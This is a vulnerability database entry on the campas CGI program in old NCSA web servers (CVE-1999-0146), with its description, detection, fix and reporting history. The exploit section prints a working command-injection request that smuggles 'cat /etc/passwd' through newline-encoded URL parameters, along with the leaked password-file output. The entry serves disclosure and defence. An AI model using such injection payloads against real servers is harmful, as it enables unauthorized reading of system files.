Campas

Vulnerability Description

Brief description: Campas cgi-bin file executes remote commands

Full description: The campas (1) CGI program allows a remote attacker to execute commands on a web server with the privileges of the user owning the server process. The campas program is included as a sample CGI program in some older versions of the NCSA web server.

Components: NCSA web server cgi

Systems:

Effect(s) of exploiting: Remote user can execte command with privileges of web server

Detecting the hole:

1. See if you have the campas program in the cgi-bin directory. If so, you have the bug.

Fixing the hole:

1. Delete this script. It is not needed.

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0146 -- The campas CGI program provided with some NCSA web servers allows an attacker to read arbitrary files. [DOVES note: this is not quite right. It allows execution of arbitrary programs. See the attack.]

Exploit Information

Attack:

> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
...

Related Information

Advisories: ISS X-Force database entry http-cgi-campas ; Security Focus notification ;

Related Vulnerabilities:

Reportage

Reporting: Francisco Torres in Bugtraq (Tue Jul 15 1997 18:24:31 )

Revision Number 1

1. Stacey Anderson (July 1, 2000):
   Initial entry